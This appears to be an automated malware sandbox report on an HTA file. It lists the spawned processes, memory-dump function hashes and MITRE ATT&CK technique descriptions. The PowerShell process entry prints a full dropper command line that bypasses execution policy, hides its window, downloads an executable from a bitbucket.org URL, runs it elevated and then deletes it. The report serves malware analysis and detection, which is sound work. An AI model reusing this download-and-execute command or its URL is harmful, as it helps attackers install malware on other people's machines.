flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED] X-Usage-Quota-Remaining: 999123.011 X-Usage-Request-Cost: 890.17 X-Usage-User-Time: 0.022956 X-Usage-System-Time: 0.003749 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: df99673df2ac46b9836ba8f944f589c4 Atl-Request-Id: df99673d-f2ac-46b9-836b-a8f944f589c4 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=4,atl-edge-upstream;dur=151,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Statistics

Click to jump to process

Memory Usage

• mshta.exe
• powershell.exe
• conhost.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• mshta.exe
• powershell.exe
• conhost.exe

Click to jump to process

Target ID:	0
Start time:	07:33:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\1111.hta"
Imagebase:	0x3c0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:33:54
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('https://bitbucket.org/docspaceplace/test2/downloads/1.exe', $path); Start-Sleep -Seconds 10; Start-Process -Verb RunAs -FilePath $path -ArgumentList '-install'; Start-Sleep -Seconds 20; Remove-Item -Verb RunAs -Path \$path -Force"
Imagebase:	0x8f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:33:54
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 07A30670 Relevance: 13.0, Strings: 10, Instructions: 524COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07A30B4D
4'^q, xrefs: 07A30A03
tP^q, xrefs: 07A30B59
$^q, xrefs: 07A30B08
$^q, xrefs: 07A30AE2
4'^q, xrefs: 07A30A0F
$^q, xrefs: 07A307A7
$^q, xrefs: 07A30B14
$^q, xrefs: 07A3073C
$^q, xrefs: 07A30797

Memory Dump Source

Source File: 00000001.00000002.1993849546.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1065491568
Opcode ID: ba632e88918ed224afb366e34035aaf692be81444b155934c887882284e9a7eb
Instruction ID: b19981ece05a39052d85ab3ebaed089bc1506ff8c2666860953fdcc545ff5abd
Opcode Fuzzy Hash: ba632e88918ed224afb366e34035aaf692be81444b155934c887882284e9a7eb
Instruction Fuzzy Hash: 3A0223B1B043099FDB248F6898007AB7BF7EFC6211F14846AF565CB292DE71C885C7A1

Function 07A32005 Relevance: 5.5, Strings: 4, Instructions: 522COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07A323F2
4'^q, xrefs: 07A3228E
4'^q, xrefs: 07A323E8
4'^q, xrefs: 07A32298

Memory Dump Source

Source File: 00000001.00000002.1993849546.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 378b5776580d94fd12f34418730be7e17141ef3f411647654a5457c1eaf0f87f
Instruction ID: 8a955d869fc33cc25a1d98c3b819a463863728c06edda2de47fcb1bec332da2e
Opcode Fuzzy Hash: 378b5776580d94fd12f34418730be7e17141ef3f411647654a5457c1eaf0f87f
Instruction Fuzzy Hash: 42023BF1B043169FDB258F6899007AABBA2BFC2210F1480ABF5258F2D5DF35D985C791

Function 04B198A0 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

LR^q, xrefs: 04B1994D
(Xcq, xrefs: 04B19A2F

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: cc68a6d9f21f8be30a41744829c1bde3faff857a78c0633a33d5e4ea85a42e05
Instruction ID: cb1d744efe66ec25792738bb66f53446915a47a0adf82ef668d63e9a6fc4326b
Opcode Fuzzy Hash: cc68a6d9f21f8be30a41744829c1bde3faff857a78c0633a33d5e4ea85a42e05
Instruction Fuzzy Hash: 3B522734B002188FEB24DB64D954B6DBBB2BF89304F5180E9D8499B3A5DF34AD85CF91

Function 04B19890 Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

LR^q, xrefs: 04B1994D
(Xcq, xrefs: 04B19A2F

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 724076202969713a293c64d137aad087d3c08996e234f55a7b1321bbd9218eb9
Instruction ID: a9f9a3e23650897fb31b1005d1f93600093058da454c05bb17ed8a5e8d11fe99
Opcode Fuzzy Hash: 724076202969713a293c64d137aad087d3c08996e234f55a7b1321bbd9218eb9
Instruction Fuzzy Hash: 2171CF70A043948FEB11CF68C860B9DBBB1FF86310F0141DAD4859B2A6DB71AD45CB92

Function 07A30653 Relevance: 2.6, Strings: 2, Instructions: 117COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A3073C
$^q, xrefs: 07A30797

Memory Dump Source

Source File: 00000001.00000002.1993849546.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 95e0c54216fb959834cabacbac4ee3fa346b8462c0187370cd3bcbbecdc4d0d0
Instruction ID: d94a6e5c5cb2464f37971dc1d65007aa8a73786ebd02a68413dc6586ffdd1352
Opcode Fuzzy Hash: 95e0c54216fb959834cabacbac4ee3fa346b8462c0187370cd3bcbbecdc4d0d0
Instruction Fuzzy Hash: 7741B1F0A1030A9FDB248F24C944BBB7BF6EF95252F544066F4248B291D7B9D981CF91

Function 04B1A450 Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

8bq, xrefs: 04B1A477

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 3c0a637c449a587a7c6c1f7d3586fbd6f3ec0604640b115c5596101115cf9ffd
Instruction ID: 104d3dbe07ad04b7bbbed9e5150d4f22b893c63dc23de40a590eac344bfb564b
Opcode Fuzzy Hash: 3c0a637c449a587a7c6c1f7d3586fbd6f3ec0604640b115c5596101115cf9ffd
Instruction Fuzzy Hash: 420126302402044FD710DFACD444A6EBBF6EFCA211B0044A9D8069B762CF74FC0987A1

Function 04B1A500 Relevance: .6, Instructions: 599COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29a0a33537bf654856cdd3bc80dc8db88a3283aadfdd9c8e798799f8ca956c5f
Instruction ID: f5a0b65d56643893249823b2f603a98ed02259391b210c736f7c0d41f15bac55
Opcode Fuzzy Hash: 29a0a33537bf654856cdd3bc80dc8db88a3283aadfdd9c8e798799f8ca956c5f
Instruction Fuzzy Hash: B2425D70A012099FCB05DF98C584AAEFBB2FF88310F648599E855AB365C735FD81CB90

Function 04B15630 Relevance: .5, Instructions: 484COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f89a5e7da3cb02f37fd723fb3afafe1d6c64fad2e3366bcb1044a70ad6a21e0
Instruction ID: c9003a18c59d369564f7d63163ce8eb4b299934abfac0ff19fd3bec2b4dedc13
Opcode Fuzzy Hash: 1f89a5e7da3cb02f37fd723fb3afafe1d6c64fad2e3366bcb1044a70ad6a21e0
Instruction Fuzzy Hash: 87121B74A01209EFCB15DF98C594AAEFBB1FF88310F658599E805AB365C735EC81CB90

Function 04B129F0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 416e396373e0eb42e725107d79ab69212fe0776669af0247e8e9294d21084469
Instruction ID: a0d08a975dcf3dde8364d2af858e8ee6b2f7733c345fde3117cd614bd4e8c6e0
Opcode Fuzzy Hash: 416e396373e0eb42e725107d79ab69212fe0776669af0247e8e9294d21084469
Instruction Fuzzy Hash: 85918AB4A002498FCB19CF59C4949AEFBB1FF89310B24859AD915AB3A5C735FC51CFA0

Function 04B12B00 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f32197f0a455a4efb74bb601e1ba73a9188fb519a1430f02821ffedd829fc84b
Instruction ID: 29aa50c338c479215e620431391759755d924977f9d4d8d736036954b8f689d4
Opcode Fuzzy Hash: f32197f0a455a4efb74bb601e1ba73a9188fb519a1430f02821ffedd829fc84b
Instruction Fuzzy Hash: 134128B4A005498FCB09CF58C5989AAFBB1FF88310B658599D915AB364C736FC51CFA0

Function 04B1A4EF Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c514b154942380c7944cd76ecee5db5094bb573f4f6435de142fded17b9a8a4b
Instruction ID: 6d044095fd2a51dd1c5d1a405eaa9e8c90f03f5bd70f2ffa9db42732d7eaa96c
Opcode Fuzzy Hash: c514b154942380c7944cd76ecee5db5094bb573f4f6435de142fded17b9a8a4b
Instruction Fuzzy Hash: B6311974A046058FCB10CF5DD5849AAFBB5FB88310B1489A9E519EB765C731FC41CF90

Function 04B14820 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f4cb06dca9f71a24ea104acf171494413c130059f593611cdc95456e530881
Instruction ID: bee3475291fedb5f15ecc488fb8349e739ff2cf3dca7b099c109fd37c20e5328
Opcode Fuzzy Hash: b4f4cb06dca9f71a24ea104acf171494413c130059f593611cdc95456e530881
Instruction Fuzzy Hash: 552149B4A042598FCB00CF98C4809AABBF0FF89300B148596E805EB362C731FD41CBA1

Function 04B14810 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f20ba1d8bf1f141911968730498a34fcf5af0e9903ea84a0067e612ab2ecae9c
Instruction ID: affd128d29c7eb73e9c78ec9583ec512a6d9ddc547bc1d7f927d1f9d3c69a4f9
Opcode Fuzzy Hash: f20ba1d8bf1f141911968730498a34fcf5af0e9903ea84a0067e612ab2ecae9c
Instruction Fuzzy Hash: 93211A74A042599FCB01DF98C9909AEBBF5FF89310B158595E809EB362C331FC41CBA1

Function 04B1AEC8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dbc1255f17e145152331adc39310ff083b72049a7f65b75eec8cb87e3451f7d
Instruction ID: 57aaf1a0472fc4dfe5253f1d1ea52ad1527f7b415c9ac4a6a1394649ebc7db1f
Opcode Fuzzy Hash: 6dbc1255f17e145152331adc39310ff083b72049a7f65b75eec8cb87e3451f7d
Instruction Fuzzy Hash: D8110630209395CFC715DB65C84896EBFB4EF87215B4480EEE4598B2A2C734A959CBA1

Function 04B1A410 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e9388e833c53e2b37746f12cc83724126f609b3bcce2ac0211d12fc83d3b9f3
Instruction ID: 62dae659cdb3153025c8dfc023f5e3ebc3d05d3542610256c43698b25f9e4875
Opcode Fuzzy Hash: 5e9388e833c53e2b37746f12cc83724126f609b3bcce2ac0211d12fc83d3b9f3
Instruction Fuzzy Hash: 0111C434A402098FDB01DFE4E850A9DBFB2FF49320F014195E805AB366DB35E8018BA1

Function 04A1D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988554599.0000000004A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b27bf795b4ddfb57328f8e6094f6c8327d59deee0f9213a128e0d9d0960b6bcf
Instruction ID: 8cfa0a580cba790ec03ceb5b5edad06eca604f327b505b12ffa9dc4d096f7554
Opcode Fuzzy Hash: b27bf795b4ddfb57328f8e6094f6c8327d59deee0f9213a128e0d9d0960b6bcf
Instruction Fuzzy Hash: DE012B715083009AF7104F29EDC4767BFE8DF41324F08C42AED4A1B156D279F841C6B1

Function 04A1D006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988554599.0000000004A1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a1d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e3264c00f8cd2d301768af1db8807d48e7a5296f69cf3103d55aaf14f485bb2
Instruction ID: 95e11b0adb6e53182453dbeb9196768c8014a4d6fa73f9af905823f13e1b10fa
Opcode Fuzzy Hash: 3e3264c00f8cd2d301768af1db8807d48e7a5296f69cf3103d55aaf14f485bb2
Instruction Fuzzy Hash: 6001527140E3C09FE7128B25DD94B52BFB4EF42224F18C0CBD9889F1A3C269A844C772

Function 04B1AEB7 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2495ac1c814fe9e742a1356f3fd7891a6ceded8fab62d567c206919236d5ce8
Instruction ID: d737c6d5756494f8a91fd83471da30280b2fd64693da8a2b427ab25864f86432
Opcode Fuzzy Hash: c2495ac1c814fe9e742a1356f3fd7891a6ceded8fab62d567c206919236d5ce8
Instruction Fuzzy Hash: 1E01FC30106394CFC712CB69D88499EBFF4DF46214F0944EED4998B1A2C731E858CB72

Function 04B1A37B Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622b6e12e913e400d2080444d9796b34cfbba18b0e5a78a699563d90d934a99a
Instruction ID: 3d4cd86891b81dfcc0621a992925ca6b0169b2a7400ee680dfb60f9beb9e6133
Opcode Fuzzy Hash: 622b6e12e913e400d2080444d9796b34cfbba18b0e5a78a699563d90d934a99a
Instruction Fuzzy Hash: F411B374E402099FDB04DFA4D994ADDBBB1FF88314F1145A9E905BB361DB31A841CF60

Function 04B1A340 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4868bf2145942a5d2c542dcc45bb7b1ae0e84e4c73948a82787f78869bb086bf
Instruction ID: ecb8ff80105948e06bfee1a9134ef2318db535337fadde2da456b3fd8fe349d9
Opcode Fuzzy Hash: 4868bf2145942a5d2c542dcc45bb7b1ae0e84e4c73948a82787f78869bb086bf
Instruction Fuzzy Hash: 5CF03CB5E442099F8F14DFA9A4411FDFBF5EB48210F0084ABD419E3701EB346A428FD2

Function 04B1ACB2 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e189d5233f9dc1570938e6de2543d1a601d13a5cfa4a73bee297f52b731f49ab
Instruction ID: 62d36d19a34c596c16d6e9fb15751094419ccebe5fb9c1e6763ab40b859101b3
Opcode Fuzzy Hash: e189d5233f9dc1570938e6de2543d1a601d13a5cfa4a73bee297f52b731f49ab
Instruction Fuzzy Hash: 3401C9B4E0020A8FCB40DF68C4859AABBF0FF09315F505199E505EB321E731A985CF91

Function 04B1ACC0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc359c644164503e7e8084bd5854ce75033225dee5ed96f9c917318000ef757
Instruction ID: f1904a58eaeadb95d1e966ae56a4d8301487e8831e6e273d5293973455834e3c
Opcode Fuzzy Hash: efc359c644164503e7e8084bd5854ce75033225dee5ed96f9c917318000ef757
Instruction Fuzzy Hash: F9F0A974E0020A8FC780DF68D485AAEBBF0FF49310F5051A9D509DB321E730A945CB91

Function 04B1A350 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b917e3e716df3248a84552f82dd7094301111f8ae258c58140b30f2e47892da
Instruction ID: 667eb39d4ea79ed5b6eb33f95fbbef3a6709a1edc0907fefe7e0b76685cba467
Opcode Fuzzy Hash: 1b917e3e716df3248a84552f82dd7094301111f8ae258c58140b30f2e47892da
Instruction Fuzzy Hash: 95E0B6B4E0420E9F8F48DFB995421BEFBF5AB08200F0085AE9819E3300E63856018F95

Function 04B1A420 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca8a9557c329f1523a1801c7d75eb160c7d1e13d01dc33480674fabc07d7b01
Instruction ID: 82b6cea502246f4b157d195efe39bdf37ddaf40864e285838451d1ac1016cdb6
Opcode Fuzzy Hash: 9ca8a9557c329f1523a1801c7d75eb160c7d1e13d01dc33480674fabc07d7b01
Instruction Fuzzy Hash: FAD0A7392002109FD704EFA8F50CD497BAAFF4D2257014095F909C7332CB25EC008BE1

Function 04B1A312 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1988827100.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4b10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7724bf719f373c212ba8cebedd94d45cb0545c007e150f269852e13111b40a8
Instruction ID: 97312cf2d70bc0c9fe4b54b7e407dae2e5c752c881979df132269670bb35ca27
Opcode Fuzzy Hash: c7724bf719f373c212ba8cebedd94d45cb0545c007e150f269852e13111b40a8
Instruction Fuzzy Hash: 46D0923020D284CFD311ABA8B4497A47BA4AF09215F4440C5E189868A3DA64B494C7A6

Non-executed Functions

Function 07A34428 Relevance: 9.1, Strings: 7, Instructions: 378COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07A34729
$^q, xrefs: 07A347F6
$^q, xrefs: 07A3481A
4'^q, xrefs: 07A3471D
4'^q, xrefs: 07A344C2
4'^q, xrefs: 07A344B8
$^q, xrefs: 07A3480E

Memory Dump Source

Source File: 00000001.00000002.1993849546.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3199432138
Opcode ID: 2b4f5b3c17654ecdb78d72e69bd0ec42fac4c354a22d959de1819bb7465c6c34
Instruction ID: dd889665057ae51fa15d08f4f9a73cb3db95618008f802131edb9afeae1fdbdb
Opcode Fuzzy Hash: 2b4f5b3c17654ecdb78d72e69bd0ec42fac4c354a22d959de1819bb7465c6c34
Instruction Fuzzy Hash: 2EC137B1B043968FC7158F6994006B6BBE6AFCA221F14847FE525CB251DF32CC86C791

Function 07A33638 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07A3364A
$^q, xrefs: 07A336A0
$^q, xrefs: 07A33694
$^q, xrefs: 07A33666

Memory Dump Source

Source File: 00000001.00000002.1993849546.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 7a02dff003bd2eee19caa53a3802f1658e1b0e899c704750a9f31f0c6635b051
Instruction ID: 16bd7be192165420feca703fd4fee77f4cdd1b41b50606b2c91a84ec1646a95b
Opcode Fuzzy Hash: 7a02dff003bd2eee19caa53a3802f1658e1b0e899c704750a9f31f0c6635b051
Instruction Fuzzy Hash: 212177F174830A6FDF284E2A9C04B3BA6EA9BC1711F25843AF515CF381DE36C8418762

Function 07A303EB Relevance: 5.0, Strings: 4, Instructions: 46COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07A3045F
4'^q, xrefs: 07A30453
$^q, xrefs: 07A3043E
$^q, xrefs: 07A30432

Memory Dump Source

Source File: 00000001.00000002.1993849546.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7a30000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 646c97b24b4647cac8c2ac13257646bd23bb0fe1729cf8e8252ff96f5f53cbad
Instruction ID: ffc2527d5b16fe81c4d9df5443b6614359f051bb14daec52a6154841d9ec1e43
Opcode Fuzzy Hash: 646c97b24b4647cac8c2ac13257646bd23bb0fe1729cf8e8252ff96f5f53cbad
Instruction Fuzzy Hash: 8A01D671B093854FD72B1B28182415A6FB75FC365071A44D7E051CF267CD144D8DC3A3

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
